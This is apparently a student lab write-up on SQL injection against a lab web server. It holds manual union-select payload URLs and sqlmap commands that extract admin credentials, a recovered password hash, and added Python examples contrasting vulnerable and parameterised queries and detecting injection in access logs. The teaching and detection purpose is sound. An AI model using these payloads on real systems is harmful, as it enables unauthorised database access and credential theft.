Lab objective
Give students an understanding of how SQL injection works and how it is exploited.
Lab content
- Lab target URL: http://10.110.2.145:8008/

- Obtain the password of the admin account by manual injection
- Take screenshots during the lab; screenshots of both the payload and the result are required
Lab screenshots
- Manual SQL injection
http://10.110.2.145:8008/article.php?id=1 and 1=1    # page content is returned

http://10.110.2.145:8008/article.php?id=1 and 1=2    # no page content is returned

Use ORDER BY to determine the number of columns
http://10.110.2.145:8008/article.php?id=1 order by 18    # page content is returned

http://10.110.2.145:8008/article.php?id=1 order by 19    # no page content is returned (so there are 18 columns)

Get the current database:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

Get the tables in the current database:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

Get the columns of the yzsoumember table:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='yzsoumember'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

Get the contents of the username and password columns of the yzsoumember table:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(username,password) from jian.yzsoumember),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
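The manual steps above only work because the application pastes the `id` parameter straight into the SQL text. The following is an added example, not code from the lab or from the target application: it rebuilds the article lookup in Python over an in-memory SQLite database (the target is PHP/MySQL; table names, columns and the stored password value are constructed) and shows the same `-1 union select ...` pattern succeeding against string concatenation and failing against a parameterised query with input validation.

```python
import sqlite3


def make_db():
    """Constructed sample schema: one article table and one member table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE article(id INTEGER, title TEXT, body TEXT);
        INSERT INTO article VALUES (1, 'Hello', 'first post');
        CREATE TABLE member(id INTEGER, username TEXT, password TEXT);
        INSERT INTO member VALUES (1, 'admin', 'constructed-hash');
        """
    )
    return conn


def fetch_article_vulnerable(conn, article_id):
    """Builds the query by string concatenation, so the caller's input
    becomes part of the SQL statement itself (the flaw the lab exploits)."""
    sql = "SELECT id, title, body FROM article WHERE id=" + article_id
    return conn.execute(sql).fetchall()


def fetch_article_safe(conn, article_id):
    """Validates the type and binds the value as a parameter, so the input
    is only ever compared as a number and never parsed as SQL."""
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        return []  # reject non-numeric ids instead of building a query
    return conn.execute(
        "SELECT id, title, body FROM article WHERE id=?", (article_id,)
    ).fetchall()


# Same shape as the lab's payload: make the original query return nothing,
# then append rows from another table with a matching column count.
PAYLOAD = "-1 union select 1,username,password from member"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", fetch_article_vulnerable(db, PAYLOAD))
    print("safe:", fetch_article_safe(db, PAYLOAD))
    print("safe, normal input:", fetch_article_safe(db, "1"))
```

Run it and the vulnerable function returns the member row in place of an article, while the parameterised version returns nothing for the payload and the expected article for a normal id. The type check is what makes the `-1 union ...` string unreachable; the parameter binding is what protects ids that are valid numbers but arrive through other injection-prone paths.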

- Injection with the sqlmap tool
Scan the site with sqlmap: sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1"

List the database names: sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" --dbs
The dede database is found:

List the tables in the dede database:
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede --tables
The dede_admin table is found

Dump the entire contents of the dede_admin table
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -T dede_admin --dump

Pwd=f297a57a5a743894a0e4
Username admin, password admin
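Every request in this lab, manual or sqlmap-driven, leaves a line in the web server's access log, and the payloads have recognisable shapes: a boolean probe (`and 1=1`), an `order by N` column-count probe, a `union select`, and reads from `information_schema`; sqlmap additionally announces itself in its default User-Agent. The following is an added detection example, not part of the lab: it parses constructed Apache combined-format log lines (client address, timestamps and the sqlmap version string are all made up), URL-decodes the query string, and reports which signatures each request matched.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures are matched against the URL-decoded query string.
SIGNATURES = [
    ("boolean-probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-enum", re.compile(r"information_schema\.", re.I)),
]

# Constructed sample log lines mirroring the request shapes used in the lab.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:10:00:00 +0800] "GET /article.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:10:00:01 +0800] "GET /article.php?id=1%20and%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:10:00:02 +0800] "GET /article.php?id=1%20order%20by%2018 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:10:00:03 +0800] "GET /article.php?id=-1%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables),3 HTTP/1.1" 200 4880 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:10:00:04 +0800] "GET /article.php?id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0 (constructed)"',
]


def analyse_line(line):
    """Parse one log line and return a dict with the matched signatures,
    or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded_query = unquote_plus(urlsplit(m.group("path")).query)
    hits = [name for name, rx in SIGNATURES if rx.search(decoded_query)]
    if "sqlmap" in m.group("ua").lower():
        hits.append("sqlmap-user-agent")
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "query": decoded_query, "hits": hits}


def find_injection_attempts(lines):
    """Return only the parsed lines that matched at least one signature."""
    results = (analyse_line(line) for line in lines)
    return [r for r in results if r and r["hits"]]


if __name__ == "__main__":
    for hit in find_injection_attempts(LOG_LINES):
        print(f'{hit["ts"]} {hit["ip"]} {hit["hits"]} {hit["query"]}')
```

Decoding before matching matters: the same payload can arrive as `%20`, `+`, or mixed case, and matching the raw URL would miss it. Note also that the sqlmap User-Agent check only catches the default; the lab's manual requests carry a normal browser agent, so the query-string signatures are what actually surface them.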
